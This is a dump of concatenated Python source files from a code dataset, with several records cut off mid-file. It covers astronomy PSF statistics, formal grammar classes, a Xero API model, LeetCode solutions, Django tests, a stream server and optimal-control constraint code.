with the RESERVED flag')\n parser.add_argument('--frac', default=1., type=float,\n help='Choose a random fraction of the input stars')\n parser.add_argument('--mod', default=True,\n action='store_const', const=True,\n help='If true it subtracts the mean from each field before calculating correlations')\n parser.add_argument('--sn', default=True,\n action='store_const', const=True,\n help='If true multiply by 2 the variances of all correlations. 
Shape-noise error.')\n parser.add_argument('--outpath', default='/home2/dfa/sobreira/alsina/catalogs/output/alpha-beta-gamma',\n help='location of the output of the files')\n parser.add_argument('--tomo', default=False,\n action='store_const', const=True,\n help='Run all tomographic correlations')\n parser.add_argument('--nz_source',\n default='/home2/dfa/sobreira/alsina/catalogs/y3_master/nz_source_zbin.h5',\n help='Full Path to the source redshift bins file')\n \n \n args = parser.parse_args()\n\n return args\n\n \ndef main():\n import sys\n sys.path.insert(0, '/home/dfa/sobreira/alsina/alpha-beta-gamma/code/src')\n #sys.path.insert(0, '/global/cscratch1/sd/alsina/alpha-beta-gamma/code/src')\n \n import numpy as np\n from read_psf_cats import read_data, toList, read_h5\n from run_rho import do_tau_stats\n import h5py as h\n \n args = parse_args()\n\n #Make directory where the output data will be\n outpath = os.path.expanduser(args.outpath)\n try:\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n except OSError:\n if not os.path.exists(outpath): raise\n \n\n #Reading metacal catalog\n #galkeys = ['ra']\n #blabla = read_h5(args.metacal_cat, 'catalog/metacal/sheared_1m', galkeys )\n \n #Reading Mike stars catalog\n keys = ['ra', 'dec','obs_e1', 'obs_e2', 'obs_T',\n 'piff_e1', 'piff_e2', 'piff_T', 'mag']\n \n exps = toList(args.exps_file)\n data_stars, bands, tilings = read_data(exps, args.piff_cat , keys,\n limit_bands=args.bands,\n use_reserved=args.use_reserved)\n print(\"Objects\", len(data_stars))\n data_stars = data_stars[data_stars['mag']<20]\n print(\"Objects with magnitude <20\", len(data_stars))\n meanra = np.mean(data_stars['ra'])\n meandec = np.mean(data_stars['dec']) \n \n \n if(args.tomo):\n #Make directory where the output data will be\n ipath = os.path.join(args.outpath, 'tomo_taus' )\n outpath = os.path.expanduser(ipath)\n try:\n if not os.path.exists(outpath):\n os.makedirs(outpath)\n except OSError:\n if not os.path.exists(outpath): raise\n print('Starting Tomography!')\n galkeys = ['ra','dec','e_1','e_2','R11','R22']\n data_gal = read_h5(args.metacal_cat, 'catalog/metacal/unsheared', galkeys )\n print(\"Total objects in catalog:\", len(data_gal))\n dgamma = 2*0.01\n f = h.File(args.metacal_cat, 'r')\n index = f['index']\n select = np.array(index['select'])\n select_1p = np.array(index['select_1p']); select_1m = np.array(index['select_1m'])\n select_2p = np.array(index['select_2p']); select_2m = np.array(index['select_2m']) \n\n n = h.File(args.nz_source, 'r')\n zbin_array = np.array(n['nofz/zbin'])\n\n nbins = 4\n for bin_c in range(nbins):\n print('Starting bin!', bin_c)\n ind = np.where( zbin_array==bin_c )[0]\n ind_1p = np.where(np.array(n['nofz/zbin_1p'])==bin_c)\n ind_1m = np.where(np.array(n['nofz/zbin_1m'])==bin_c)\n ind_2p = np.where(np.array(n['nofz/zbin_2p'])==bin_c)\n ind_2m = np.where(np.array(n['nofz/zbin_2m'])==bin_c)\n R11s = (data_gal['e_1'][select_1p][ind_1p].mean() -\n data_gal['e_1'][select_1m][ind_1m].mean() )/dgamma\n R22s = (data_gal['e_2'][select_2p][ind_2p].mean() -\n data_gal['e_2'][select_2m][ind_2m].mean() )/dgamma\n Rs = [R11s, R22s]\n\n patchstars = [];patchgal = []\n patchstars.append((data_stars['ra']>meanra)&(data_stars['dec']>meandec))\n patchstars.append((data_stars['ra']<meanra)&(data_stars['dec']>meandec))\n patchstars.append((data_stars['ra']<meanra)&(data_stars['dec']<meandec))\n patchstars.append((data_stars['ra']>meanra)&(data_stars['dec']<meandec))\n patchgal.append((data_gal[select][ind]['ra']>meanra)&(data_gal[select][ind]['dec']>meandec))\n patchgal.append((data_gal[select][ind]['ra']<meanra)&(data_gal[select][ind]['dec']>meandec))\n 
patchgal.append((data_gal[select][ind]['ra']<meanra)&(data_gal[select][ind]['dec']<meandec))\n patchgal.append((data_gal[select][ind]['ra']>meanra)&(data_gal[select][ind]['dec']<meandec))\n patchstars.append((data_stars['ra']>meanra)&(data_stars['dec']>meandec))\n patchstars.append((data_stars['ra']<meanra)&(data_stars['dec']>meandec))\n patchstars.append((data_stars['ra']<meanra)&(data_stars['dec']<meandec))\n patchstars.append((data_stars['ra']>meanra)&(data_stars['dec']<meandec))\n patchgal.append((data_gal[select]['ra']>meanra)&(data_gal[select]['dec']>meandec))\n patchgal.append((data_gal[select]['ra']<meanra)&(data_gal[select]['dec']>meandec))\n patchgal.append((data_gal[select]['ra']<meanra)&(data_gal[select]['dec']<meandec))\n patchgal.append((data_gal[select]['ra']>meanra)&(data_gal[select]['dec']<meandec))\n return \"{0} -> {1}\".format(''.join(self.alpha), ''.join(self.beta))\n\n def __cmp__(self, other):\n if (isinstance(other, ProductionRule)):\n if (self.alpha == other.alpha and self.beta == other.beta):\n return True\n\n return False\n\n\"\"\"\"\"\"\nclass UnrestrictedGrammar:\n def __init__(self, Terminals, Rules, Start):\n\n NonTerminals = set()\n\n if not(isinstance(Terminals, set)):\n raise TypeError\n if not(isinstance(Rules, set)):\n raise TypeError\n if not(isinstance(Start, str)):\n raise TypeError\n\n for R in Rules:\n if not(isinstance(R, ProductionRule)):\n raise TypeError\n\n if (R.alpha == []):\n print(str(R) + ', is an invalid Rule.')\n raise ValueError\n\n for c in R.alpha:\n if (c not in Terminals):\n NonTerminals.add(c)\n for c in R.beta:\n if (c not in Terminals):\n NonTerminals.add(c)\n\n if (Start not in NonTerminals):\n print(NonTerminals)\n print(Start + ' is an invalid Start.')\n raise ValueError\n\n self.NonTerminals = NonTerminals\n self.Terminals = Terminals\n self.Rules = Rules\n self.Start = Start\n\n def parse(self, String):\n raise HaltError\n\n\"\"\"\"\"\"\nclass ContextSensitiveGrammar(UnrestrictedGrammar):\n def __init__(self, Terminals, Rules, Start):\n UnrestrictedGrammar.__init__(self, Terminals, Rules, Start)\n\n flagSe = False\n for R in self.Rules:\n flagCF = False\n for i in range(len(R.alpha)):\n a1 = R.alpha[:i]\n n1 = R.alpha[i]\n b1 = R.alpha[i + 1:]\n\n if (n1 in self.NonTerminals):\n a2 = R.beta[:i]\n n2 = R.beta[i:len(R.beta) - len(b1)]\n b2 = R.beta[len(R.beta) - len(b1):]\n\n if (a1 == a2 and b1 == b2):\n if (n2 == []):\n if (R.alpha == [self.Start]):\n flagCF = True\n flagSe = True\n else:\n flagCF = True\n\n if not(flagCF):\n print('The following rule, ' + str(R) + ', is not context sensitive.')\n raise ValueError\n\n if (flagSe):\n for R in Rules:\n for c in R.beta:\n if (c == Start):\n print('The following rule, ' + str(R) + ', is not context sensitive.')\n raise ValueError\n\n\"\"\"\"\"\"\nclass ContextFreeGrammar(ContextSensitiveGrammar):\n def __init__(self, Terminals, Rules, Start):\n ContextSensitiveGrammar.__init__(self, Terminals, Rules, Start)\n\n for R in Rules:\n if (len(R.alpha) > 1):\n print('The following rule, ' + str(R) + ', is not context free.')\n raise ValueError\n\n\"\"\"\"\"\"\nclass RegularGrammar(ContextFreeGrammar):\n def __init__(self, Terminals, Rules, Start):\n ContextFreeGrammar.__init__(self, Terminals, Rules, Start)\n\n LRG = False\n RRG = False\n for R in self.Rules:\n nTcount = 0\n for c in R.beta:\n if (c in self.NonTerminals):\n nTcount += 1\n if (nTcount >= 2):\n print('The following rule, ' + str(R) + ', is not regular.')\n raise ValueError\n\n for i in range(len(R.beta)):\n n = R.beta[i]\n if (n in self.NonTerminals):\n nL = R.beta[:i]\n nR = R.beta[i + 1:]\n\n if (nL != []):\n RRG = True\n if (nR != []):\n LRG = True\n\n if (RRG and LRG):\n print('The following rule, ' + str(R) + ', is not regular.')\n raise ValueError","sub_path":"Grammar.py","file_name":"Grammar.py","file_ext":"py","file_size_in_byte":4599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"615479342","text":"# 
coding: utf-8\n\n\"\"\"\n Xero Finance API\n\n The Finance API is a collection of endpoints which customers can use in the course of a loan application, which may assist lenders to gain the confidence they need to provide capital. # noqa: E501\n\n Contact: api@xero.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport re # noqa: F401\n\nfrom xero_python.models import BaseModel\n\n\nclass ContactTotalDetail(BaseModel):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n \"total_paid\": \"float\",\n \"total_outstanding\": \"float\",\n \"total_credited_un_applied\": \"float\",\n }\n\n attribute_map = {\n \"total_paid\": \"totalPaid\",\n \"total_outstanding\": \"totalOutstanding\",\n \"total_credited_un_applied\": \"totalCreditedUnApplied\",\n }\n\n def __init__(\n self, total_paid=None, total_outstanding=None, total_credited_un_applied=None\n ): # noqa: E501\n \"\"\"ContactTotalDetail - a model defined in OpenAPI\"\"\" # noqa: E501\n\n self._total_paid = None\n self._total_outstanding = None\n self._total_credited_un_applied = None\n self.discriminator = None\n\n if total_paid is not None:\n self.total_paid = total_paid\n if total_outstanding is not None:\n self.total_outstanding = total_outstanding\n if total_credited_un_applied is not None:\n self.total_credited_un_applied = total_credited_un_applied\n\n @property\n def total_paid(self):\n \"\"\"Gets the total_paid of this ContactTotalDetail. # noqa: E501\n\n Total paid invoice and cash value for the contact within the period. # noqa: E501\n\n :return: The total_paid of this ContactTotalDetail. # noqa: E501\n :rtype: float\n \"\"\"\n return self._total_paid\n\n @total_paid.setter\n def total_paid(self, total_paid):\n \"\"\"Sets the total_paid of this ContactTotalDetail.\n\n Total paid invoice and cash value for the contact within the period. # noqa: E501\n\n :param total_paid: The total_paid of this ContactTotalDetail. # noqa: E501\n :type: float\n \"\"\"\n\n self._total_paid = total_paid\n\n @property\n def total_outstanding(self):\n \"\"\"Gets the total_outstanding of this ContactTotalDetail. # noqa: E501\n\n Total outstanding invoice value for the contact within the period. # noqa: E501\n\n :return: The total_outstanding of this ContactTotalDetail. # noqa: E501\n :rtype: float\n \"\"\"\n return self._total_outstanding\n\n @total_outstanding.setter\n def total_outstanding(self, total_outstanding):\n \"\"\"Sets the total_outstanding of this ContactTotalDetail.\n\n Total outstanding invoice value for the contact within the period. # noqa: E501\n\n :param total_outstanding: The total_outstanding of this ContactTotalDetail. # noqa: E501\n :type: float\n \"\"\"\n\n self._total_outstanding = total_outstanding\n\n @property\n def total_credited_un_applied(self):\n \"\"\"Gets the total_credited_un_applied of this ContactTotalDetail. # noqa: E501\n\n Total unapplied credited value for the contact within the period. # noqa: E501\n\n :return: The total_credited_un_applied of this ContactTotalDetail. 
# noqa: E501\n :rtype: float\n \"\"\"\n return self._total_credited_un_applied\n\n @total_credited_un_applied.setter\n def total_credited_un_applied(self, total_credited_un_applied):\n \"\"\"Sets the total_credited_un_applied of this ContactTotalDetail.\n\n Total unapplied credited value for the contact within the period. # noqa: E501\n\n :param total_credited_un_applied: The total_credited_un_applied of this ContactTotalDetail. # noqa: E501\n :type: float\n \"\"\"\n\n self._total_credited_un_applied = total_credited_un_applied\n","sub_path":"xero_python/finance/models/contact_total_detail.py","file_name":"contact_total_detail.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"217137915","text":"from collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n def trap(self, height: List[int]) -> int:\n idx_map = defaultdict(list)\n sorted_height = sorted(height, reverse=True)\n # Build the idx map (num -> indices) ahead of time\n for i, h in enumerate(height):\n idx_map[h].append(i)\n # Take the heights that occur in height, from the largest down\n i = 0\n ans = 0\n left_max = len(height)\n right_max = -1\n while i < len(sorted_height):\n # For each height, add up the water that can pool at that level\n cur = sorted_height[i]\n l = idx_map[cur][0]\n r = idx_map[cur][-1]\n if l < left_max:\n left_max = l\n if r > right_max:\n right_max = r\n i += len(idx_map[cur])\n if left_max == right_max:\n continue\n for j in range(left_max+1, right_max):\n if height[j] < cur:\n ans += (cur - height[j])\n height[j] = cur\n return ans\n","sub_path":"LeetCode/Hard/42TrappingRainWater.py","file_name":"42TrappingRainWater.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"590477972","text":"\ndef count_boomerangs(lst):\n result = 0\n if len(lst) < 3:\n return 0\n for i in range(len(lst) - 2):\n if (lst[i] == lst[i+2] and lst[i] != lst[i+1]):\n result += 1\n return result\n\n","sub_path":"25zkiePFYRpickxnB_16.py","file_name":"25zkiePFYRpickxnB_16.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"132573676","text":"\"\"\"\nmodel.py\n\nContains the Model class, which stores the definitions of the given model\n\"\"\"\nfrom math import sqrt\n\nclass Model(object):\n\n def __init__(self, n_ef, n_fields, mpsi, m0):\n self.n_ef = n_ef\n self.n_fields = n_fields\n self.m0 = m0\n self.mpsi = mpsi\n # Compute derivative quantities\n self.mupsi2 = 3 - sqrt(9 - 4*mpsi**2)\n self.muphi2 = m0**2\n self.lamda = -3/2 + sqrt(9/4 + m0**2)\n self.beta = 1/(2*self.lamda)\n","sub_path":"stack/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"169358839","text":"from datetime import datetime\nfrom typing import List\n\nimport pytest\n\nfrom django_unicorn.components import UnicornView\nfrom django_unicorn.views.action_parsers.utils import set_property_value\nfrom example.coffee.models import Flavor\n\n\nclass FakeComponent(UnicornView):\n string = \"property_view\"\n integer = 99\n datetime = datetime(2020, 1, 1)\n array: List[str] = []\n model = Flavor(name=\"initial-flavor\")\n queryset = Flavor.objects.none()\n\n\ndef test_set_property_value_str():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert \"property_view\" == component.string\n\n set_property_value(\n component,\n \"string\",\n \"property_view_updated\",\n 
{\"string\": \"property_view_updated\"},\n )\n\n assert \"property_view_updated\" == component.string\n\n\ndef test_set_property_value_int():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert 99 == component.integer\n\n set_property_value(component, \"integer\", 100, {\"integer\": 100})\n\n assert 100 == component.integer\n\n\ndef test_set_property_value_datetime():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert datetime(2020, 1, 1) == component.datetime\n\n set_property_value(\n component, \"datetime\", datetime(2020, 1, 2), {\"datetime\": datetime(2020, 1, 2)}\n )\n\n assert datetime(2020, 1, 2) == component.datetime\n\n\ndef test_set_property_value_model():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert \"initial-flavor\" == component.model.name\n\n set_property_value(\n component,\n \"model\",\n Flavor(name=\"test-flavor\"),\n {\"model\": {\"name\": \"test-flavor\"}},\n )\n\n assert \"test-flavor\" == component.model.name\n\n\n@pytest.mark.django_db\ndef test_set_property_value_queryset():\n component = FakeComponent(component_name=\"test\", component_id=\"12345678\")\n assert len(component.queryset) == 0\n\n flavor_one = Flavor(name=\"test-flavor-one\")\n flavor_one.save()\n flavor_two = Flavor(name=\"test-flavor-two\")\n flavor_two.save()\n queryset = Flavor.objects.all()[:2]\n\n set_property_value(\n component,\n \"queryset\",\n queryset,\n {\"queryset\": [{\"name\": \"test-flavor-one\"}, {\"name\": \"test-flavor-two\"}]},\n )\n\n assert len(queryset) == 2\n","sub_path":"tests/views/action_parsers/utils/test_set_property_value.py","file_name":"test_set_property_value.py","file_ext":"py","file_size_in_byte":2356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"159696242","text":"import numpy as np\nfrom project_1 import Molecule, a, b\n#Butadiene\n\nbutadiene_H = np.matrix([[a, b, 0, 0], [b, a, b, 0],\n [0, b, a, b], [0, 0, b, a]])\nbutadiene = Molecule(\"Butadine\", butadiene_H, 4, 4, 2)\n\nbutadiene.set_constants(0, -1)\nbutadiene.generate_eigen()\nbutadiene.find_deloc_energy()\nbutadiene.energy_level_plot()\nbutadiene.find_charge_density()\nbutadiene.find_bond_order()\nprint(butadiene)\n","sub_path":"BONDs/Butadiene.py","file_name":"Butadiene.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"201974950","text":"import os\nimport argparse\nfrom core.models import SimpleNN\nfrom core.utils import randomize, cross_validation, save_normalization_model, reload_normalization_model\nfrom core.train_nn import train\nfrom core.data_preparation import Predictive\nfrom core.predict import predict\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--csv-file\", type=str, default=\"./csv_files/predictive_maintenance_dataset.csv\",\n help=\"input csv file path\")\n parser.add_argument(\"--mode\", type=str, default=\"train\", help=\"application mode, either train or deploy\")\n args = parser.parse_args()\n assert os.path.exists(os.path.normpath(args.csv_file)), \"csv file not found\"\n assert args.mode in [\"train\", \"predict\"], \"specified mode is not supported\"\n\n csv_path = os.path.normpath(args.csv_file)\n mode = args.mode\n save_path = os.path.join(os.getcwd(), 'nn-model-checkpoints')\n\n task = Predictive(csv_path)\n df = task.clean_data()\n data, label = 
task.get_data_label(df)\n\n no_features = data.shape[1]\n\n if mode == \"train\":\n data, label = randomize(data, label)\n x_train, y_train, x_validation, y_validation, x_test, y_test = cross_validation(data, label,\n is_regression=False)\n save_normalization_model(x_train, \"nn-norm-checkpoints\")\n x_train = reload_normalization_model(x_train, \"nn-norm-checkpoints\")\n x_validation = reload_normalization_model(x_validation, \"nn-norm-checkpoints\")\n x_test = reload_normalization_model(x_test, \"nn-norm-checkpoints\")\n\n model = SimpleNN(no_features=no_features, no_labels=2, hidden_layers=[100, 50])\n model.build_graph()\n train(model, save_path, x_train, y_train, x_validation, y_validation)\n predict(model, save_path, x_test, y_test, is_regression=False)\n else:\n model = SimpleNN(no_features=no_features, no_labels=2, hidden_layers=[100, 50])\n model.build_graph()\n data = reload_normalization_model(data, \"nn-norm-checkpoints\")\n predict(model, save_path, data, label, is_regression=False)\n","sub_path":"main_predictive.py","file_name":"main_predictive.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"35442392","text":"import os\nimport time\nfrom datetime import datetime\n\nfrom lib.socket_handlers import SocketHandler\nfrom lib.requests import ReadRequest, ReadResponse\nfrom lib.loopable import Loopable\nfrom base_server import BaseServer\n\n\n# we are going to be reading data back from its storage spot\n# and streaming it @ someone else\n\n\nclass ReadServer(BaseServer):\n\n def make_work_request(self):\n request = ReadRequest()\n self.bb_client.read_wait(request, self.handle_request)\n\n def handle_request(self, t):\n super(ReadServer,self).handle_request(t)\n\n request = ReadRequest(t)\n response = ReadResponse(key=request.key,\n url=self.get_url(),\n port=self.get_port())\n\n handler = ReadHandler(self, request.key, request.offset,\n (response.url,response.port))\n\n\nclass ReadHandler(object):\n chunk_size = 1024\n\n def __init__(self, server, stream_id, offset, host_port):\n # abs path to file to be read\n self.read_path = None\n self.server = server\n self.stream_id = stream_id\n self.host_port = host_port\n\n # number of seconds in the past we should read from the stream\n self.offset = offset\n\n # we need to find the correct file to read from\n self.setup_read_point()\n\n # now we need to setup a read handler from that file\n # at the given offset\n self.setup_file_handler()\n\n # now setup our socket handler to listen on given host / port\n self.out_handler = SocketHandler(self.host_port)\n\n # whenever data is sent from the socket we want to\n # send more\n self.out_handler.on('send', self.handle_send)\n\n # prime the socket with some data\n self.send_data(self.chunk_size)\n\n def setup_read_point(self):\n # figure out the date/time we're reading from\n epoch = time.time() - self.offset\n s = datetime.fromtimestamp(epoch)\n # get its rel path\n r_path = os.sep.join([str(s.year),str(s.month),str(s.day), self.stream_id,\n str(s.hour),str(s.minute)])\n # where's it actually saved?\n save_root = self.server.config.get('stream_save_root')\n path = os.path.join(save_root,r_path)\n self.read_path = path\n\n def setup_file_handler(self):\n # open a file handler to the file\n self.read_fh = open(self.read_path,'rb')\n\n # now seek to the offset we want\n\n\n def handle_send(self, d):\n # we want there to always be data waiting to go out\n # so when we send some, read in the next chunk and\n # send it to the socket to go out\n data_len = len(d)\n 
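# Back-pressure: queue exactly as many bytes as the socket just flushed, so the outgoing buffer stays primed but never grows without bound.\n 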
self.send_data(data_len)\n\n def send_data(self, l):\n # we want to send the next chunk of data of len l\n data = self.read_fh.read(l)\n self.out_handler.push(data)\n\n\ndef find_video(storage_root,stream_id,dt):\n \"\"\"\n returns the abs path to the video file at the given\n date time for the given stream off the given storage root\n if the file is not found returns None\n \"\"\"\n\n # start by finding the hour we want\n r_hr_path = os.sep.join([str(dt.year),str(dt.month),str(dt.day),stream_id,str(dt.hour)])\n hr_path = os.path.join(storage_root,r_hr_path)\n if not os.path.exists(hr_path):\n return None\n\n # now that we know the folder for the hour exists, let's see if we can\n # find the video file for the exact time we want\n # to estimate\n","sub_path":"servers/read_server.py","file_name":"read_server.py","file_ext":"py","file_size_in_byte":3413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"22122012","text":"#! animatingProjectile.py\n# Animates the trajectory of an object in projectile motion\n\nfrom matplotlib import pyplot as plt;\nfrom matplotlib import animation;\nimport math;\ng = 9.81;\n\ndef get_intervals(u,theta):\n t_flight = 2*u*math.sin(theta)/g;\n intervals = [];\n start = 0;\n interval = 0.041667; # See if you can tweak this to match real life. 24fps\n while start 0:\n instance.__dict__[self.strange_name] = value\n else:\n raise ValueError('%s must > 0' % self.strange_name)\n\n\nclass LineItem:\n\n weight = Quantity('name')\n price = Quantity('price')\n\n def __init__(self, description, weight, price):\n self.description = description\n self.weight = weight\n self.price = price\n self.test = Quantity('test')\n\n def subtotal(self):\n return self.weight * self.price\n\n\nl = LineItem('lineitem', 100, 2.0)\nprint(l.weight)\nprint(l.test) # <__main__.Quantity object at 0x03B8D610>\n","sub_path":"chap20 Attribute Descriptors/bulfood_v3.py","file_name":"bulfood_v3.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"7647928","text":"from typing import Callable, Union, Any\n\nimport numpy as np\nfrom casadi import sum1, if_else, vertcat, lt, SX, MX\nimport biorbd_casadi as biorbd\n\nfrom .path_conditions import Bounds\nfrom .penalty import PenaltyFunctionAbstract, PenaltyOption, PenaltyNodeList\nfrom ..interfaces.biorbd_interface import BiorbdInterface\nfrom ..misc.enums import Node, InterpolationType, PenaltyType, ConstraintType\nfrom ..misc.fcn_enum import FcnEnum\nfrom ..misc.options import OptionList\n\n\nclass Constraint(PenaltyOption):\n \"\"\"\n A placeholder for a constraint\n\n Attributes\n ----------\n min_bound: np.ndarray\n The vector of minimum bound of the constraint. Default is 0\n max_bound: np.ndarray\n The vector of maximal bound of the constraint. 
Default is 0\n phase: int\n The index of the phase to apply the constraint\n quadratic: bool\n If the penalty is quadratic\n params:\n Generic parameters for options\n \"\"\"\n custom_function = None\n if not isinstance(constraint, (ConstraintFcn, ImplicitConstraintFcn)):\n custom_function = constraint\n constraint = ConstraintFcn.CUSTOM\n\n super(Constraint, self).__init__(\n penalty=constraint, phase=phase, quadratic=quadratic, custom_function=custom_function, **params\n )\n\n if isinstance(constraint, ImplicitConstraintFcn):\n self.penalty_type = ConstraintType.IMPLICIT # doing this puts the relevance of this enum in question\n\n self.min_bound = min_bound\n self.max_bound = max_bound\n self.bounds = Bounds(interpolation=InterpolationType.CONSTANT)\n\n def set_penalty(self, penalty: Union[MX, SX], all_pn: PenaltyNodeList):\n super(Constraint, self).set_penalty(penalty, all_pn)\n self.min_bound = 0 if self.min_bound is None else self.min_bound\n self.max_bound = 0 if self.max_bound is None else self.max_bound\n\n def add_or_replace_to_penalty_pool(self, ocp, nlp):\n if self.type == ConstraintFcn.TIME_CONSTRAINT:\n self.node = Node.END\n\n super(Constraint, self).add_or_replace_to_penalty_pool(ocp, nlp)\n\n self.min_bound = np.array(self.min_bound) if isinstance(self.min_bound, (list, tuple)) else self.min_bound\n self.max_bound = np.array(self.max_bound) if isinstance(self.max_bound, (list, tuple)) else self.max_bound\n\n if self.bounds.shape[0] == 0:\n for i in self.rows:\n min_bound = (\n self.min_bound[i]\n if hasattr(self.min_bound, \"__getitem__\") and self.min_bound.shape[0] > 1\n else self.min_bound\n )\n max_bound = (\n self.max_bound[i]\n if hasattr(self.max_bound, \"__getitem__\") and self.max_bound.shape[0] > 1\n else self.max_bound\n )\n self.bounds.concatenate(Bounds(min_bound, max_bound, interpolation=InterpolationType.CONSTANT))\n elif self.bounds.shape[0] != len(self.rows):\n raise RuntimeError(f\"bounds rows is {self.bounds.shape[0]} but should be {self.rows} or empty\")\n\n def _add_penalty_to_pool(self, all_pn: PenaltyNodeList):\n if self.penalty_type == PenaltyType.INTERNAL:\n pool = all_pn.nlp.g_internal if all_pn is not None and all_pn.nlp else all_pn.ocp.g_internal\n elif self.penalty_type == ConstraintType.IMPLICIT:\n pool = all_pn.nlp.g_implicit if all_pn is not None and all_pn.nlp else all_pn.ocp.g_implicit\n elif self.penalty_type == PenaltyType.USER:\n pool = all_pn.nlp.g if all_pn is not None and all_pn.nlp else all_pn.ocp.g\n else:\n raise ValueError(f\"Invalid constraint type {self.penalty_type}.\")\n pool[self.list_index] = self\n\n def clear_penalty(self, ocp, nlp):\n if self.penalty_type == PenaltyType.INTERNAL:\n g_to_add_to = nlp.g_internal if nlp else ocp.g_internal\n elif self.penalty_type == ConstraintType.IMPLICIT:\n g_to_add_to = nlp.g_implicit if nlp else ocp.g_implicit\n elif self.penalty_type == PenaltyType.USER:\n g_to_add_to = nlp.g if nlp else ocp.g\n else:\n raise ValueError(f\"Invalid Type of Constraint {self.penalty_type}\")\n\n if self.list_index < 0:\n for i, j in enumerate(g_to_add_to):\n if not j:\n self.list_index = i\n return\n else:\n g_to_add_to.append([])\n self.list_index = len(g_to_add_to) - 1\n else:\n while self.list_index >= len(g_to_add_to):\n g_to_add_to.append([])\n g_to_add_to[self.list_index] = []\n\n\nclass ConstraintList(OptionList):\n \"\"\"\n A list of Constraint if more than one is required\n\n Methods\n -------\n add(self, constraint: Union[Callable, \"ConstraintFcn\"], **extra_arguments)\n Add a new Constraint 
to the list\n print(self)\n Print the ConstraintList to the console\n \"\"\"\n\n def add(self, constraint: Union[Callable, Constraint, Any], **extra_arguments: Any):\n \"\"\"\n Add a new constraint to the list\n\n Parameters\n ----------\n constraint: Union[Callable, Constraint, ConstraintFcn]\n The chosen constraint\n extra_arguments: dict\n Any parameters to pass to Constraint\n \"\"\"\n\n if isinstance(constraint, Constraint):\n self.copy(constraint)\n\n else:\n super(ConstraintList, self)._add(option_type=Constraint, constraint=constraint, **extra_arguments)\n\n def print(self):\n \"\"\"\n Print the ConstraintList to the console\n \"\"\"\n # TODO: Print all elements in the console\n raise NotImplementedError(\"Printing of ConstraintList is not ready yet\")\n\n\nclass ConstraintFunction(PenaltyFunctionAbstract):\n \"\"\"\n Internal (re)implementation of the penalty functions\n\n Methods\n -------\n inner_phase_continuity(ocp)\n Add continuity constraints between each node of a phase.\n inter_phase_continuity(ocp)\n Add phase transition constraints between two phases.\n node_equalities(ocp)\n Add phase multi node constraints between specified nodes and phases.\n clear_penalty(ocp: OptimalControlProgram, nlp: NonLinearProgram, penalty: Constraint)\n Resets a penalty. A negative penalty index creates a new empty penalty.\n penalty_nature() -> str\n Get the nature of the penalty\n \"\"\"\n\n class Functions:\n \"\"\"\n Implementation of all the constraint functions\n \"\"\"\n\n @staticmethod\n def non_slipping(\n constraint: Constraint,\n all_pn: PenaltyNodeList,\n tangential_component_idx: int,\n normal_component_idx: int,\n static_friction_coefficient: float,\n ):\n \"\"\"\n Add a constraint of static friction at contact points constraining for small tangential forces.\n This function makes the assumption that normal_force is always positive\n That is mu*normal_force = tangential_force. 
To avoid using a square root, the previous\n equation is squared\n\n Parameters\n ----------\n constraint: Constraint\n The actual constraint to declare\n all_pn: PenaltyNodeList\n The penalty node elements\n tangential_component_idx: int\n Index of the tangential component of the contact force.\n [0] = x_indices, [1] = y_indices / or [0] = component\n normal_component_idx: int\n Index of the normal component of the contact force\n static_friction_coefficient: float\n Static friction coefficient\n \"\"\"\n\n nlp = all_pn.nlp\n\n if isinstance(tangential_component_idx, int):\n tangential_component_idx = [tangential_component_idx]\n elif not isinstance(tangential_component_idx, (tuple, list)):\n raise RuntimeError(\"tangential_component_idx must be a unique integer or a list of integers\")\n\n if isinstance(normal_component_idx, int):\n normal_component_idx = [normal_component_idx]\n elif not isinstance(normal_component_idx, (tuple, list)):\n raise RuntimeError(\"normal_component_idx must be a unique integer or a list of integers\")\n\n mu_squared = static_friction_coefficient**2\n constraint.min_bound = np.array([0, 0])\n constraint.max_bound = np.array([np.inf, np.inf])\n\n contact = all_pn.nlp.contact_forces_func(nlp.states.cx, nlp.controls.cx, nlp.parameters.cx)\n normal_contact_force_squared = sum1(contact[normal_component_idx, 0]) ** 2\n if len(tangential_component_idx) == 1:\n tangential_contact_force_squared = sum1(contact[tangential_component_idx[0], 0]) ** 2\n elif len(tangential_component_idx) == 2:\n tangential_contact_force_squared = (\n sum1(contact[tangential_component_idx[0], 0]) ** 2\n + sum1(contact[tangential_component_idx[1], 0]) ** 2\n )\n else:\n raise (ValueError(\"tangential_component_idx should either be x and y or only one component\"))\n\n slipping = 